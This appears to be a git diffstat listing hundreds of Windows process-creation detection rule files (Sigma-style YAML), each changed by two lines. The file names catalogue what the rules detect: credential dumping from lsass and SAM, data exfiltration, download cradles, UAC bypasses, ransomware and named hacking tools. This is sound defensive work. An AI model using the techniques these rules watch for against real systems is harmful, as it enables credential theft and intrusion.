.../proc_access_win_uac_bypass_wow64_logger.yml | 2 +- .../proc_creation_win_aadinternals_cmdlets_execution.yml | 2 +- .../proc_creation_win_advanced_port_scanner.yml | 2 +- ...roc_creation_win_anydesk_execution_from_susp_folders.yml | 2 +- .../proc_creation_win_anydesk_piped_password_via_cli.yml | 2 +- .../proc_creation_win_apt_apt29_thinktanks.yml | 2 +- .../process_creation/proc_creation_win_apt_babyshark.yml | 2 +- .../proc_creation_win_apt_bear_activity_gtr19.yml | 2 +- .../process_creation/proc_creation_win_apt_bluemashroom.yml | 2 +- .../process_creation/proc_creation_win_apt_chafer_mar18.yml | 2 +- .../process_creation/proc_creation_win_apt_cloudhopper.yml | 2 +- .../process_creation/proc_creation_win_apt_elise.yml | 2 +- .../proc_creation_win_apt_emissarypanda_sep19.yml | 2 +- .../proc_creation_win_apt_equationgroup_dll_u_load.yml | 2 +- .../proc_creation_win_apt_evilnum_jul20.yml | 2 +- .../proc_creation_win_apt_greenbug_may20.yml | 2 +- .../process_creation/proc_creation_win_apt_hafnium.yml | 2 +- .../proc_creation_win_apt_hurricane_panda.yml | 2 +- .../proc_creation_win_apt_judgement_panda_gtr19.yml | 2 +- .../proc_creation_win_apt_lazarus_activity_dec20.yml | 2 +- .../proc_creation_win_apt_lazarus_loader.yml | 2 +- .../process_creation/proc_creation_win_apt_mercury.yml | 2 +- .../process_creation/proc_creation_win_apt_mustangpanda.yml | 2 +- .../process_creation/proc_creation_win_apt_revil_kaseya.yml | 2 +- .../process_creation/proc_creation_win_apt_slingshot.yml | 2 +- .../process_creation/proc_creation_win_apt_sofacy.yml | 2 +- .../process_creation/proc_creation_win_apt_ta17_293a_ps.yml | 2 +- .../proc_creation_win_apt_ta505_dropper.yml | 2 +- .../process_creation/proc_creation_win_apt_taidoor.yml | 2 +- .../proc_creation_win_apt_turla_comrat_may20.yml | 2 +- .../process_creation/proc_creation_win_apt_unc2452_cmds.yml | 2 +- .../process_creation/proc_creation_win_apt_unc2452_ps.yml | 2 +- .../proc_creation_win_apt_winnti_mal_hk_jan20.yml | 2 +- .../proc_creation_win_apt_winnti_pipemon.yml | 2 +- .../process_creation/proc_creation_win_apt_wocao.yml | 2 +- .../process_creation/proc_creation_win_apt_zxshell.yml | 2 +- .../proc_creation_win_archiver_iso_phishing.yml | 2 +- .../proc_creation_win_attrib_system_susp_paths.yml | 2 +- .../proc_creation_win_bad_opsec_sacrificial_processes.yml | 2 +- .../proc_creation_win_bitsadmin_download_susp_domain.yml | 2 +- .../proc_creation_win_bitsadmin_download_susp_ext.yml | 2 +- .../proc_creation_win_bitsadmin_download_susp_ip.yml | 2 +- ...oc_creation_win_bitsadmin_download_susp_targetfolder.yml | 2 +- ...reation_win_bitsadmin_download_uncommon_targetfolder.yml | 2 +- .../proc_creation_win_browser_remote_debugging.yml | 2 +- .../process_creation/proc_creation_win_c2_sliver.yml | 2 +- .../proc_creation_win_certutil_ntlm_coercion.yml | 2 +- .../proc_creation_win_change_default_file_assoc_susp.yml | 2 +- .../process_creation/proc_creation_win_chisel_usage.yml | 2 +- .../proc_creation_win_chromium_headless_debugging.yml | 2 +- .../proc_creation_win_cmd_redirection_susp_folder.yml | 2 +- .../process_creation/proc_creation_win_cmdkey_recon.yml | 2 +- .../proc_creation_win_cmstp_com_object_access.yml | 2 +- .../proc_creation_win_cobaltstrike_process_patterns.yml | 2 +- ...proc_creation_win_commandline_path_traversal_evasion.yml | 2 +- .../proc_creation_win_computer_discovery_get_adcomputer.yml | 2 +- .../proc_creation_win_conhost_path_traversal.yml | 2 +- .../proc_creation_win_copy_browser_data.yml | 2 +- .../proc_creation_win_copy_dmp_from_share.yml | 2 +- .../proc_creation_win_crackmapexec_patterns.yml | 2 +- .../proc_creation_win_creative_cloud_node_abuse.yml | 2 +- .../process_creation/proc_creation_win_crime_fireball.yml | 2 +- .../proc_creation_win_crime_maze_ransomware.yml | 2 +- .../proc_creation_win_crime_snatch_ransomware.yml | 2 +- .../proc_creation_win_crypto_mining_monero.yml | 2 +- .../process_creation/proc_creation_win_curl_download.yml | 2 +- .../process_creation/proc_creation_win_dinjector.yml | 2 +- .../process_creation/proc_creation_win_disable_service.yml | 2 +- .../proc_creation_win_dll_sideload_vmware_xfer.yml | 2 +- .../proc_creation_win_dns_serverlevelplugindll.yml | 2 +- .../proc_creation_win_driverquery_recon.yml | 2 +- .../proc_creation_win_driverquery_usage.yml | 2 +- .../proc_creation_win_dsacls_abuse_permissions.yml | 2 +- .../proc_creation_win_dsacls_password_spray.yml | 2 +- .../proc_creation_win_dumpstack_log_evasion.yml | 2 +- .../proc_creation_win_email_exfil_via_powershell.yml | 2 +- ...oc_creation_win_enable_susp_windows_optional_feature.yml | 2 +- .../proc_creation_win_enumeration_for_credentials_cli.yml | 2 +- .../proc_creation_win_etw_trace_evasion.yml | 2 +- .../proc_creation_win_exfil_data_via_cli.yml | 2 +- .../proc_creation_win_exploit_cve_2015_1641.yml | 2 +- .../proc_creation_win_exploit_cve_2017_0261.yml | 2 +- .../proc_creation_win_exploit_cve_2017_11882.yml | 2 +- .../proc_creation_win_exploit_cve_2017_8759.yml | 2 +- .../proc_creation_win_exploit_cve_2019_1378.yml | 2 +- .../proc_creation_win_exploit_cve_2019_1388.yml | 2 +- .../proc_creation_win_exploit_cve_2020_10189.yml | 2 +- .../proc_creation_win_exploit_cve_2020_1350.yml | 2 +- .../proc_creation_win_exploit_lpe_cve_2021_41379.yml | 2 +- .../proc_creation_win_exploit_systemnightmare.yml | 2 +- .../process_creation/proc_creation_win_findstr_lsass.yml | 2 +- .../proc_creation_win_findstr_recon_everyone.yml | 2 +- .../proc_creation_win_get_localgroup_member_recon.yml | 2 +- .../process_creation/proc_creation_win_gmer_execution.yml | 2 +- .../proc_creation_win_gpg4win_susp_usage.yml | 2 +- .../process_creation/proc_creation_win_hack_adcspwn.yml | 2 +- .../process_creation/proc_creation_win_hack_bloodhound.yml | 2 +- .../proc_creation_win_hack_cube0x0_tools.yml | 2 +- .../process_creation/proc_creation_win_hack_dumpert.yml | 2 +- .../process_creation/proc_creation_win_hack_htran.yml | 2 +- .../process_creation/proc_creation_win_hack_inveigh.yml | 2 +- .../process_creation/proc_creation_win_hack_krbrelay.yml | 2 +- .../process_creation/proc_creation_win_hack_krbrelayup.yml | 2 +- .../process_creation/proc_creation_win_hack_rubeus.yml | 2 +- .../process_creation/proc_creation_win_hack_safetykatz.yml | 2 +- .../proc_creation_win_hack_secutyxploded.yml | 2 +- .../process_creation/proc_creation_win_hack_sharpersist.yml | 2 +- .../proc_creation_win_hack_sharpldapwhoami.yml | 2 +- .../process_creation/proc_creation_win_hack_sysmoneop.yml | 2 +- .../windows/process_creation/proc_creation_win_hack_wce.yml | 2 +- .../proc_creation_win_hacktool_imphashes.yml | 2 +- .../process_creation/proc_creation_win_handlekatz.yml | 2 +- .../process_creation/proc_creation_win_hh_chm_http.yml | 2 +- .../proc_creation_win_hktl_createminidump.yml | 2 +- .../proc_creation_win_hktl_uacme_uac_bypass.yml | 2 +- .../process_creation/proc_creation_win_hwp_exploits.yml | 2 +- .../proc_creation_win_iis_appcmd_susp_module_install.yml | 2 +- .../proc_creation_win_iis_appcmd_susp_rewrite_rule.yml | 2 +- .../proc_creation_win_imaging_devices_unusual_parents.yml | 2 +- .../proc_creation_win_impacket_compiled_tools.yml | 2 +- .../proc_creation_win_import_cert_susp_locations.yml | 2 +- .../proc_creation_win_import_module_susp_dirs.yml | 2 +- .../proc_creation_win_inline_base64_mz_header.yml | 2 +- .../proc_creation_win_inline_win_api_access.yml | 2 +- .../proc_creation_win_install_reg_debugger_backdoor.yml | 2 +- rules/windows/process_creation/proc_creation_win_iox.yml | 2 +- .../process_creation/proc_creation_win_lolbin_adplus.yml | 2 +- .../proc_creation_win_lolbin_agentexecutor.yml | 2 +- .../proc_creation_win_lolbin_agentexecutor_susp_usage.yml | 2 +- .../proc_creation_win_lolbin_certoc_download.yml | 2 +- .../proc_creation_win_lolbin_customshellhost.yml | 2 +- ...roc_creation_win_lolbin_device_credential_deployment.yml | 2 +- .../proc_creation_win_lolbin_dll_sideload_xwizard.yml | 2 +- .../proc_creation_win_lolbin_execution_via_winget.yml | 2 +- .../process_creation/proc_creation_win_lolbin_forfiles.yml | 2 +- .../proc_creation_win_lolbin_ieexec_download.yml | 2 +- .../proc_creation_win_lolbin_installutil_download.yml | 2 +- .../proc_creation_win_lolbin_kavremover.yml | 2 +- .../proc_creation_win_lolbin_launch_vsdevshell.yml | 2 +- .../process_creation/proc_creation_win_lolbin_mftrace.yml | 2 +- .../proc_creation_win_lolbin_msdt_answer_file.yml | 2 +- .../proc_creation_win_lolbin_msohtmed_download.yml | 2 +- .../proc_creation_win_lolbin_mspub_download.yml | 2 +- .../proc_creation_win_lolbin_openconsole.yml | 2 +- .../process_creation/proc_creation_win_lolbin_pcalua.yml | 2 +- .../proc_creation_win_lolbin_pcwrun_follina.yml | 2 +- .../proc_creation_win_lolbin_presentationhost.yml | 2 +- .../proc_creation_win_lolbin_presentationhost_download.yml | 2 +- .../process_creation/proc_creation_win_lolbin_regasm.yml | 2 +- .../proc_creation_win_lolbin_register_app.yml | 2 +- .../proc_creation_win_lolbin_scriptrunner.yml | 2 +- .../process_creation/proc_creation_win_lolbin_sftp.yml | 2 +- .../proc_creation_win_lolbin_sideload_link_binary.yml | 2 +- .../process_creation/proc_creation_win_lolbin_sigverif.yml | 2 +- .../process_creation/proc_creation_win_lolbin_squirrel.yml | 2 +- .../proc_creation_win_lolbin_susp_acccheckconsole.yml | 2 +- .../proc_creation_win_lolbin_susp_certreq_download.yml | 2 +- .../proc_creation_win_lolbin_susp_dxcap.yml | 2 +- .../proc_creation_win_lolbin_susp_grpconv.yml | 2 +- .../process_creation/proc_creation_win_lolbin_type.yml | 2 +- .../proc_creation_win_lolbin_vsiisexelauncher.yml | 2 +- .../process_creation/proc_creation_win_lolbin_winword.yml | 2 +- .../proc_creation_win_mailboxexport_share.yml | 2 +- .../process_creation/proc_creation_win_mal_adwind.yml | 2 +- .../proc_creation_win_mal_darkside_ransomware.yml | 2 +- .../proc_creation_win_mal_hermetic_wiper_activity.yml | 2 +- .../proc_creation_win_malicious_cmdlets.yml | 2 +- .../process_creation/proc_creation_win_malware_conti.yml | 2 +- .../proc_creation_win_malware_conti_7zip.yml | 2 +- .../proc_creation_win_malware_conti_shadowcopy.yml | 2 +- .../process_creation/proc_creation_win_malware_dridex.yml | 2 +- .../process_creation/proc_creation_win_malware_dtrack.yml | 2 +- .../process_creation/proc_creation_win_malware_emotet.yml | 2 +- .../process_creation/proc_creation_win_malware_formbook.yml | 2 +- .../process_creation/proc_creation_win_malware_notpetya.yml | 2 +- .../process_creation/proc_creation_win_malware_qbot.yml | 2 +- .../process_creation/proc_creation_win_malware_ryuk.yml | 2 +- .../proc_creation_win_malware_script_dropper.yml | 2 +- .../proc_creation_win_malware_trickbot_wermgr.yml | 2 +- .../process_creation/proc_creation_win_malware_wannacry.yml | 2 +- rules/windows/process_creation/proc_creation_win_msdt.yml | 2 +- .../proc_creation_win_msdt_susp_cab_options.yml | 2 +- .../proc_creation_win_msedge_minimized_download.yml | 2 +- .../proc_creation_win_msexchange_transport_agent.yml | 2 +- .../process_creation/proc_creation_win_mshta_http.yml | 2 +- .../proc_creation_win_msiexec_install_remote.yml | 2 +- .../proc_creation_win_net_default_accounts_manipulation.yml | 2 +- .../process_creation/proc_creation_win_net_recon.yml | 2 +- .../proc_creation_win_net_user_add_never_expire.yml | 2 +- .../process_creation/proc_creation_win_netsh_port_fwd.yml | 2 +- .../proc_creation_win_netsh_port_fwd_3389.yml | 2 +- .../proc_creation_win_new_network_provider.yml | 2 +- .../process_creation/proc_creation_win_node_abuse.yml | 2 +- rules/windows/process_creation/proc_creation_win_nps.yml | 2 +- .../proc_creation_win_nslookup_poweshell_download.yml | 2 +- .../proc_creation_win_obfuscated_ip_download.yml | 2 +- .../proc_creation_win_obfuscated_ip_via_cli.yml | 2 +- .../proc_creation_win_office_dir_traversal_cli.yml | 2 +- .../process_creation/proc_creation_win_office_shell.yml | 2 +- .../proc_creation_win_office_svchost_child.yml | 2 +- .../process_creation/proc_creation_win_outlook_shell.yml | 2 +- .../proc_creation_win_pdqdeploy_runner_susp_children.yml | 2 +- .../proc_creation_win_perl_inline_command_execution.yml | 2 +- .../proc_creation_win_persistence_typed_paths.yml | 2 +- .../proc_creation_win_php_inline_command_execution.yml | 2 +- .../proc_creation_win_plugx_susp_exe_locations.yml | 2 +- .../proc_creation_win_powershell_add_windows_capability.yml | 2 +- .../proc_creation_win_powershell_amsi_null_bits_bypass.yml | 2 +- ...proc_creation_win_powershell_base64_frombase64string.yml | 2 +- .../proc_creation_win_powershell_base64_iex.yml | 2 +- .../proc_creation_win_powershell_base64_invoke.yml | 2 +- .../proc_creation_win_powershell_base64_mppreference.yml | 2 +- ...ation_win_powershell_base64_reflective_assembly_load.yml | 2 +- .../proc_creation_win_powershell_base64_shellcode.yml | 2 +- .../proc_creation_win_powershell_base64_wmi_classes.yml | 2 +- ...roc_creation_win_powershell_defender_disable_feature.yml | 2 +- .../proc_creation_win_powershell_defender_exclusion.yml | 2 +- .../proc_creation_win_powershell_download_patterns.yml | 2 +- .../proc_creation_win_powershell_frombase64string.yml | 2 +- .../proc_creation_win_powershell_get_clipboard.yml | 2 +- .../proc_creation_win_powershell_public_folder.yml | 2 +- .../proc_creation_win_powershell_susp_download_patterns.yml | 2 +- ...roc_creation_win_powershell_susp_parameter_variation.yml | 2 +- .../proc_creation_win_powertool_execution.yml | 2 +- .../proc_creation_win_proc_dump_createdump.yml | 2 +- .../proc_creation_win_proc_dump_dumpminitool.yml | 2 +- .../proc_creation_win_proc_dump_rdrleakdiag.yml | 2 +- .../proc_creation_win_proc_dump_susp_dumpminitool.yml | 2 +- .../windows/process_creation/proc_creation_win_procdump.yml | 2 +- .../process_creation/proc_creation_win_procdump_evasion.yml | 2 +- .../proc_creation_win_process_dump_rundll32_comsvcs.yml | 2 +- .../proc_creation_win_proxy_execution_wuauclt.yml | 2 +- .../process_creation/proc_creation_win_psexesvc_start.yml | 2 +- .../proc_creation_win_pua_defendercheck.yml | 2 +- .../process_creation/proc_creation_win_pua_seatbelt.yml | 2 +- .../proc_creation_win_public_folder_parent.yml | 2 +- .../proc_creation_win_purplesharp_indicators.yml | 2 +- .../proc_creation_win_python_inline_command_execution.yml | 2 +- .../process_creation/proc_creation_win_quarks_pwdump.yml | 2 +- .../proc_creation_win_query_session_exfil.yml | 2 +- .../process_creation/proc_creation_win_ransom_blackbyte.yml | 2 +- ..._creation_win_raspberry_robin_single_dot_ending_file.yml | 2 +- .../proc_creation_win_rdp_hijack_shadowing.yml | 2 +- .../proc_creation_win_redirect_local_admin_share.yml | 2 +- .../process_creation/proc_creation_win_reg_add_run_key.yml | 2 +- .../process_creation/proc_creation_win_reg_add_safeboot.yml | 2 +- .../proc_creation_win_reg_defender_tampering.yml | 2 +- .../proc_creation_win_reg_delete_safeboot.yml | 2 +- .../proc_creation_win_reg_delete_services.yml | 2 +- .../process_creation/proc_creation_win_reg_enable_rdp.yml | 2 +- .../proc_creation_win_reg_lsa_ppl_protection_disabled.yml | 2 +- .../proc_creation_win_renamed_binary_highly_relevant.yml | 2 +- .../proc_creation_win_renamed_browsercore.yml | 2 +- .../process_creation/proc_creation_win_renamed_msdt.yml | 2 +- .../proc_creation_win_renamed_netsupport_rat.yml | 2 +- .../proc_creation_win_renamed_office_processes.yml | 2 +- .../process_creation/proc_creation_win_renamed_plink.yml | 2 +- .../process_creation/proc_creation_win_renamed_procdump.yml | 2 +- ...proc_creation_win_renamed_rundll32_dllregisterserver.yml | 2 +- .../process_creation/proc_creation_win_renamed_rurat.yml | 2 +- .../process_creation/proc_creation_win_renamed_sdelete.yml | 2 +- .../process_creation/proc_creation_win_renamed_whoami.yml | 2 +- .../process_creation/proc_creation_win_rpcss_anomalies.yml | 2 +- .../proc_creation_win_ruby_inline_command_execution.yml | 2 +- .../proc_creation_win_run_executable_invalid_extension.yml | 2 +- .../proc_creation_win_rundll32_unc_path.yml | 2 +- .../proc_creation_win_sc_delete_av_services.yml | 2 +- .../proc_creation_win_schtasks_appdata_local_system.yml | 2 +- .../proc_creation_win_schtasks_once_0000.yml | 2 +- ...eation_win_schtasks_powershell_windowsapps_execution.yml | 2 +- .../proc_creation_win_schtasks_reg_loader.yml | 2 +- .../process_creation/proc_creation_win_schtasks_system.yml | 2 +- .../proc_creation_win_screenconnect_anomaly.yml | 2 +- .../process_creation/proc_creation_win_selectmyparent.yml | 2 +- .../proc_creation_win_set_unsecure_powershell_policy.yml | 2 +- .../proc_creation_win_shadow_copies_deletion.yml | 2 +- .../proc_creation_win_sharp_chisel_usage.yml | 2 +- .../proc_creation_win_sharp_ldap_monitor.yml | 2 +- .../windows/process_creation/proc_creation_win_sharpup.yml | 2 +- .../proc_creation_win_shell_spawn_susp_program.yml | 2 +- .../process_creation/proc_creation_win_ssh_port_forward.yml | 2 +- .../proc_creation_win_ssh_rdp_tunneling.yml | 2 +- .../proc_creation_win_stickykey_like_backdoor.yml | 2 +- .../proc_creation_win_susp_3proxy_usage.yml | 2 +- .../process_creation/proc_creation_win_susp_7zip_dmp.yml | 2 +- .../proc_creation_win_susp_add_local_admin.yml | 2 +- .../proc_creation_win_susp_add_user_remote_desktop.yml | 2 +- .../process_creation/proc_creation_win_susp_advancedrun.yml | 2 +- .../proc_creation_win_susp_advancedrun_priv_user.yml | 2 +- .../proc_creation_win_susp_appx_execution.yml | 2 +- .../process_creation/proc_creation_win_susp_base64_load.yml | 2 +- .../proc_creation_win_susp_builtin_commands_recon.yml | 2 +- .../process_creation/proc_creation_win_susp_calc.yml | 2 +- .../proc_creation_win_susp_certutil_command.yml | 2 +- .../proc_creation_win_susp_certutil_encode.yml | 2 +- .../proc_creation_win_susp_clsid_foldername.yml | 2 +- .../proc_creation_win_susp_cmd_http_appdata.yml | 2 +- .../proc_creation_win_susp_cmd_shadowcopy_access.yml | 2 +- .../proc_creation_win_susp_codepage_switch.yml | 2 +- .../proc_creation_win_susp_command_flag_pattern.yml | 2 +- .../proc_creation_win_susp_commandline_chars.yml | 2 +- .../proc_creation_win_susp_compression_params.yml | 2 +- .../proc_creation_win_susp_control_dll_load.yml | 2 +- .../proc_creation_win_susp_copy_lateral_movement.yml | 2 +- .../proc_creation_win_susp_copy_system32.yml | 2 +- .../process_creation/proc_creation_win_susp_covenant.yml | 2 +- .../proc_creation_win_susp_crackmapexec_flags.yml | 2 +- .../windows/process_creation/proc_creation_win_susp_csc.yml | 2 +- .../process_creation/proc_creation_win_susp_csc_folder.yml | 2 +- .../process_creation/proc_creation_win_susp_csexec.yml | 2 +- .../proc_creation_win_susp_curl_download.yml | 2 +- .../proc_creation_win_susp_curl_fileupload.yml | 2 +- .../proc_creation_win_susp_dctask64_proc_inject.yml | 2 +- .../proc_creation_win_susp_desktopimgdownldr.yml | 2 +- .../proc_creation_win_susp_devinit_lolbin.yml | 2 +- .../proc_creation_win_susp_disable_eventlog.yml | 2 +- .../proc_creation_win_susp_disable_ie_features.yml | 2 +- .../proc_creation_win_susp_disable_raccine.yml | 2 +- .../proc_creation_win_susp_dllhost_no_cli.yml | 2 +- .../proc_creation_win_susp_double_extension.yml | 2 +- .../proc_creation_win_susp_download_office_domain.yml | 2 +- .../proc_creation_win_susp_dtrace_kernel_dump.yml | 2 +- .../proc_creation_win_susp_electron_app_children.yml | 2 +- .../proc_creation_win_susp_execution_path.yml | 2 +- .../proc_creation_win_susp_execution_path_webserver.yml | 2 +- .../proc_creation_win_susp_explorer_break_proctree.yml | 2 +- .../proc_creation_win_susp_explorer_nouaccheck.yml | 2 +- .../proc_creation_win_susp_finger_usage.yml | 2 +- .../process_creation/proc_creation_win_susp_format.yml | 2 +- .../process_creation/proc_creation_win_susp_git_clone.yml | 2 +- .../proc_creation_win_susp_guid_task_name.yml | 2 +- .../windows/process_creation/proc_creation_win_susp_gup.yml | 2 +- .../proc_creation_win_susp_gup_download.yml | 2 +- .../proc_creation_win_susp_gup_execution.yml | 2 +- .../proc_creation_win_susp_iis_module_registration.yml | 2 +- .../proc_creation_win_susp_image_missing.yml | 2 +- .../proc_creation_win_susp_invoke_webrequest_download.yml | 2 +- .../process_creation/proc_creation_win_susp_lsass_clone.yml | 2 +- .../proc_creation_win_susp_manageengine_pattern.yml | 2 +- .../proc_creation_win_susp_missing_spaces.yml | 2 +- .../proc_creation_win_susp_mofcomp_execution.yml | 2 +- .../proc_creation_win_susp_mpiexec_lolbin.yml | 2 +- .../proc_creation_win_susp_mshta_pattern.yml | 2 +- .../proc_creation_win_susp_mshtml_runhtmlapplication.yml | 2 +- .../process_creation/proc_creation_win_susp_msiexec_cwd.yml | 2 +- .../proc_creation_win_susp_msiexec_web_install.yml | 2 +- .../process_creation/proc_creation_win_susp_net_use.yml | 2 +- .../proc_creation_win_susp_netsupport_rat_exec_location.yml | 2 +- .../proc_creation_win_susp_new_kernel_driver_via_sc.yml | 2 +- .../proc_creation_win_susp_new_service_creation.yml | 2 +- .../process_creation/proc_creation_win_susp_ngrok_pua.yml | 2 +- .../proc_creation_win_susp_non_exe_image.yml | 2 +- .../proc_creation_win_susp_ntdll_type_redirect.yml | 2 +- .../process_creation/proc_creation_win_susp_ntds.yml | 2 +- .../proc_creation_win_susp_ntdsutil_usage.yml | 2 +- .../process_creation/proc_creation_win_susp_ntlmrelay.yml | 2 +- .../proc_creation_win_susp_office_token_search.yml | 2 +- .../proc_creation_win_susp_outlook_temp.yml | 2 +- .../process_creation/proc_creation_win_susp_parents.yml | 2 +- .../process_creation/proc_creation_win_susp_pchunter.yml | 2 +- .../process_creation/proc_creation_win_susp_ping_hex_ip.yml | 2 +- .../proc_creation_win_susp_plink_port_forward.yml | 2 +- .../process_creation/proc_creation_win_susp_plink_usage.yml | 2 +- ...proc_creation_win_susp_powershell_base64_encoded_cmd.yml | 2 +- .../proc_creation_win_susp_powershell_download_cradles.yml | 2 +- .../proc_creation_win_susp_powershell_download_iex.yml | 2 +- .../proc_creation_win_susp_powershell_empire_launch.yml | 2 +- ...oc_creation_win_susp_powershell_encoded_cmd_patterns.yml | 2 +- .../proc_creation_win_susp_powershell_getprocess_lsass.yml | 2 +- .../proc_creation_win_susp_powershell_iex_patterns.yml | 2 +- ...roc_creation_win_susp_powershell_invocation_specific.yml | 2 +- ...oc_creation_win_susp_powershell_obfuscation_via_utf8.yml | 2 +- .../proc_creation_win_susp_powershell_sam_access.yml | 2 +- ...c_creation_win_susp_powershell_script_engine_parent_.yml | 2 +- .../proc_creation_win_susp_powershell_sub_processes.yml | 2 +- .../proc_creation_win_susp_powershell_webclient_casing.yml | 2 +- .../proc_creation_win_susp_pressynkey_lolbin.yml | 2 +- .../proc_creation_win_susp_procdump_lsass.yml | 2 +- .../proc_creation_win_susp_process_hacker.yml | 2 +- .../process_creation/proc_creation_win_susp_progname.yml | 2 +- .../process_creation/proc_creation_win_susp_ps_appdata.yml | 2 +- .../proc_creation_win_susp_ps_downloadfile.yml | 2 +- .../proc_creation_win_susp_ps_encoded_obfusc.yml | 2 +- .../proc_creation_win_susp_psexesvc_as_system.yml | 2 +- .../proc_creation_win_susp_psexesvc_renamed.yml | 2 +- ...proc_creation_win_susp_psexex_paexec_escalate_system.yml | 2 +- .../proc_creation_win_susp_psexex_paexec_flags.yml | 2 +- .../process_creation/proc_creation_win_susp_psloglist.yml | 2 +- .../proc_creation_win_susp_razorinstaller_explorer.yml | 2 +- .../proc_creation_win_susp_recon_network_activity.yml | 2 +- .../proc_creation_win_susp_reg_disable_sec_services.yml | 2 +- .../proc_creation_win_susp_regedit_trustedinstaller.yml | 2 +- .../proc_creation_win_susp_regsvr32_anomalies.yml | 2 +- .../proc_creation_win_susp_regsvr32_flags_anomaly.yml | 2 +- .../proc_creation_win_susp_regsvr32_http_pattern.yml | 2 +- .../proc_creation_win_susp_regsvr32_no_dll.yml | 2 +- .../proc_creation_win_susp_regsvr32_remote_share.yml | 2 +- .../proc_creation_win_susp_renamed_adfind.yml | 2 +- .../proc_creation_win_susp_renamed_createdump.yml | 2 +- .../proc_creation_win_susp_renamed_dctask64.yml | 2 +- .../proc_creation_win_susp_renamed_debugview.yml | 2 +- .../proc_creation_win_susp_renamed_paexec.yml | 2 +- .../proc_creation_win_susp_rundll32_by_ordinal.yml | 2 +- .../proc_creation_win_susp_rundll32_inline_vbs.yml | 2 +- ...roc_creation_win_susp_rundll32_js_runhtmlapplication.yml | 2 +- .../proc_creation_win_susp_rundll32_keymgr.yml | 2 +- .../proc_creation_win_susp_rundll32_no_params.yml | 2 +- .../proc_creation_win_susp_rundll32_sys.yml | 2 +- .../proc_creation_win_susp_rurat_exec_location.yml | 2 +- .../proc_creation_win_susp_schtask_creation.yml | 2 +- .../proc_creation_win_susp_schtask_creation_temp_folder.yml | 2 +- .../proc_creation_win_susp_schtasks_change.yml | 2 +- .../proc_creation_win_susp_schtasks_delete.yml | 2 +- .../proc_creation_win_susp_schtasks_delete_all.yml | 2 +- .../proc_creation_win_susp_schtasks_env_folder.yml | 2 +- .../proc_creation_win_susp_schtasks_folder_combos.yml | 2 +- .../proc_creation_win_susp_schtasks_parent.yml | 2 +- .../proc_creation_win_susp_schtasks_pattern.yml | 2 +- .../proc_creation_win_susp_schtasks_schedule_type.yml | 2 +- ...proc_creation_win_susp_schtasks_schedule_type_system.yml | 2 +- .../proc_creation_win_susp_screenconnect_access.yml | 2 +- .../proc_creation_win_susp_script_exec_from_env_folder.yml | 2 +- .../proc_creation_win_susp_script_exec_from_temp.yml | 2 +- ...ation_win_susp_service_dacl_modification_set_service.yml | 2 +- .../process_creation/proc_creation_win_susp_service_dir.yml | 2 +- .../proc_creation_win_susp_service_path_modification.yml | 2 +- .../proc_creation_win_susp_service_stop.yml | 2 +- ..._creation_win_susp_servu_exploitation_cve_2021_35211.yml | 2 +- .../proc_creation_win_susp_servu_process_pattern.yml | 2 +- .../proc_creation_win_susp_shellexec_rundll_usage.yml | 2 +- .../proc_creation_win_susp_shimcache_flush.yml | 2 +- .../process_creation/proc_creation_win_susp_splwow64.yml | 2 +- .../process_creation/proc_creation_win_susp_svchost.yml | 2 +- .../proc_creation_win_susp_sysprep_appdata.yml | 2 +- .../proc_creation_win_susp_system_user_anomaly.yml | 2 +- .../proc_creation_win_susp_target_location_shell32.yml | 2 +- .../proc_creation_win_susp_taskmgr_localsystem.yml | 2 +- .../proc_creation_win_susp_taskmgr_parent.yml | 2 +- .../proc_creation_win_susp_trolleyexpress_procdump.yml | 2 +- .../proc_creation_win_susp_tscon_localsystem.yml | 2 +- .../proc_creation_win_susp_tscon_rdp_redirect.yml | 2 +- .../proc_creation_win_susp_uac_bypass_trustedpath.yml | 2 +- .../proc_creation_win_susp_userinit_child.yml | 2 +- .../proc_creation_win_susp_vbscript_unc2452.yml | 2 +- .../proc_creation_win_susp_volsnap_disable.yml | 2 +- .../proc_creation_win_susp_web_sysaidserver.yml | 2 +- .../process_creation/proc_creation_win_susp_wermgr.yml | 2 +- .../process_creation/proc_creation_win_susp_whoami.yml | 2 +- .../proc_creation_win_susp_whoami_anomaly.yml | 2 +- .../proc_creation_win_susp_whoami_as_param.yml | 2 +- .../proc_creation_win_susp_win_server_undocumented_rce.yml | 2 +- .../process_creation/proc_creation_win_susp_winrar_dmp.yml | 2 +- .../proc_creation_win_susp_winrar_execution.yml | 2 +- .../proc_creation_win_susp_wmic_eventconsumer_create.yml | 2 +- .../proc_creation_win_susp_wmic_execution.yml | 2 +- .../proc_creation_win_susp_wmic_proc_create.yml | 2 +- .../proc_creation_win_susp_wuauclt_cmdline.yml | 2 +- .../proc_creation_win_sysinternals_psservice.yml | 2 +- .../proc_creation_win_sysmon_disable_sharpevtmute.yml | 2 +- .../proc_creation_win_sysmon_exploitation.yml | 2 +- .../proc_creation_win_sysmon_uac_bypass_eventvwr.yml | 2 +- .../process_creation/proc_creation_win_sysnative.yml | 2 +- .../proc_creation_win_system_exe_anomaly.yml | 2 +- ...roc_creation_win_tamper_defender_remove_mppreference.yml | 2 +- .../proc_creation_win_termserv_proc_spawn.yml | 2 +- .../process_creation/proc_creation_win_tool_nircmd.yml | 2 +- .../proc_creation_win_tool_nircmd_as_system.yml | 2 +- .../proc_creation_win_tool_nsudo_execution.yml | 2 +- .../proc_creation_win_tool_runx_as_system.yml | 2 +- .../proc_creation_win_tools_relay_attacks.yml | 2 +- .../proc_creation_win_tools_uac_bypass_computerdefaults.yml | 2 +- .../proc_creation_win_turn_on_dev_features.yml | 2 +- .../proc_creation_win_uac_bypass_changepk_slui.yml | 2 +- .../proc_creation_win_uac_bypass_cleanmgr.yml | 2 +- .../proc_creation_win_uac_bypass_consent_comctl32.yml | 2 +- .../proc_creation_win_uac_bypass_dismhost.yml | 2 +- .../proc_creation_win_uac_bypass_eventvwr.yml | 2 +- .../proc_creation_win_uac_bypass_icmluautil.yml | 2 +- .../proc_creation_win_uac_bypass_idiagnostic_profile.yml | 2 +- .../proc_creation_win_uac_bypass_ieinstal.yml | 2 +- .../proc_creation_win_uac_bypass_msconfig_gui.yml | 2 +- .../proc_creation_win_uac_bypass_ntfs_reparse_point.yml | 2 +- .../proc_creation_win_uac_bypass_pkgmgr_dism.yml | 2 +- .../proc_creation_win_uac_bypass_winsat.yml | 2 +- .../process_creation/proc_creation_win_uac_bypass_wmp.yml | 2 +- ...proc_creation_win_uac_bypass_wsreset_integrity_level.yml | 2 +- .../proc_creation_win_user_discovery_get_aduser.yml | 2 +- ...proc_creation_win_using_set_service_to_hide_services.yml | 2 +- .../proc_creation_win_vscode_child_processes_anomalies.yml | 2 +- 